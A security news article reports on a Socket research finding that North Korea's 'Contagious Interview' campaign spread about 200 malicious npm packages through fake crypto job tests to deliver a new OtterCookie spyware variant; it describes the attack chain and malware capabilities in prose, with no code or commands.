North Korea’s “Contagious Interview” Floods npm with 200 New Packages, Using Fake Crypto Jobs to Deploy OtterCookie Spyware

A relentless state-sponsored campaign by North Korean threat actors is aggressively targeting blockchain and Web3 developers by hiding malware inside seemingly legitimate coding tests. A new report from the Socket Threat Research Team reveals that the “Contagious Interview” operation has escalated significantly, flooding the npm ecosystem with nearly 200 malicious packages in a sustained effort to steal cryptocurrency and sensitive credentials.

Despite previous exposures, the campaign shows no signs of slowing down. Researchers tracked a massive surge in activity, noting that “since we last reported on this campaign, it has added at least 197 more malicious npm packages and over 31,000 additional downloads.”

The attackers are specifically hunting developers in the crypto space, using fake job interviews and “test assignments” to trick victims into installing compromised software. “This sustained tempo makes Contagious Interview one of the most prolific campaigns exploiting npm, and it shows how thoroughly North Korean threat actors have adapted their tooling to modern JavaScript and crypto-centric development workflows,” the report warns.

The investigation uncovered a sophisticated, multi-layered infrastructure designed to deliver malware while remaining hidden. Researchers gained a “rare inside view” of the operation by tracing a malicious package named tailwind-magic back to a GitHub account, stardev0914, which hosted 18 different repositories acting as malware carriers.

The attack chain relies on a “coherent adversarial delivery stack” that separates its components to evade detection:

• The Lure: Malicious code lives on legitimate-looking GitHub repositories.
• The Staging: The payload is fetched from a Vercel-hosted endpoint (tetrismic[.]vercel[.]app).
• The Command Center: A separate Command and Control (C2) server handles data theft and tasking.

One of the primary weapons in this wave is tailwind-magic, a package that masquerades as a popular legitimate library. “tailwind-magic is a typosquatted and backdoored clone of the legitimate tailwind-merge library,” the report explains. While it appears to function normally, a hidden script “contacts the threat actor-controlled endpoint… and evals the returned JavaScript,” granting the attackers “arbitrary code execution with full Node.js process privileges.”

The payload delivered by this infrastructure is a new variant of the “OtterCookie” malware. Analysts note that this latest version “blurs earlier distinctions between OtterCookie and BeaverTail,” two previously distinct malware families used by North Korean groups.

Once active on a victim’s machine, the malware is ruthless. It performs “VM and sandbox detection” to ensure it isn’t being analyzed by security researchers before establishing a long-term connection to its masters. Its capabilities are tuned for maximum financial damage:

• Total Surveillance: It provides a “remote shell, continuous clipboard theft, global keylogging, [and] multi-monitor screenshot capture.”
• Asset Theft: It launches a “recursive filesystem scanning designed to harvest credentials, seed phrases, wallet data, and sensitive documents.”
• Browser Targeting: It specifically targets profile data and crypto-wallet extensions from Chrome and Brave browsers across Windows, macOS, and Linux.

The threat actors went to great lengths to make their fake job offers appear legitimate. The stardev0914 account hosted polished but fake crypto projects to serve as lures.

One notable example was dexproject, a repository that “presents as a standard DEX front-end template.” While the application code looked normal, it was wired to pull in a malicious dependency called node-tailwind. The project was branded as a “Knightsbridge DEX,” complete with “clear copy-paste artifacts” to mimic a real platform, effectively “masquerading as ‘Knightsbridge DEX / KXCO'” to deceive job applicants.

The “Contagious Interview” campaign represents a critical threat to the Web3 development community. By weaponizing the hiring process and infiltrating the open-source supply chain, North Korean actors are successfully bypassing traditional security perimeters. As the report concludes, “the Contagious Interview campaign’s techniques persist and continue to evolve,” with new infiltrations appearing weekly.

Related Posts:

• “OtterCookie” Malware Nibbles at Developers in “Contagious Interview” Campaign
• North Korean APT “Contagious Interview” Floods npm Registry with 338 Malicious Packages to Steal Crypto
• Lazarus APT Targets Job Seekers with “Contagious Interview” Campaign Using ClickFix Technique
• WaterPlum’s OtterCookie Malware Upgrades to v4 with Credential Theft and Sandbox Detection Features
• North Korean Threat Actors Targeting Tech Job Seekers with Contagious Interview Campaign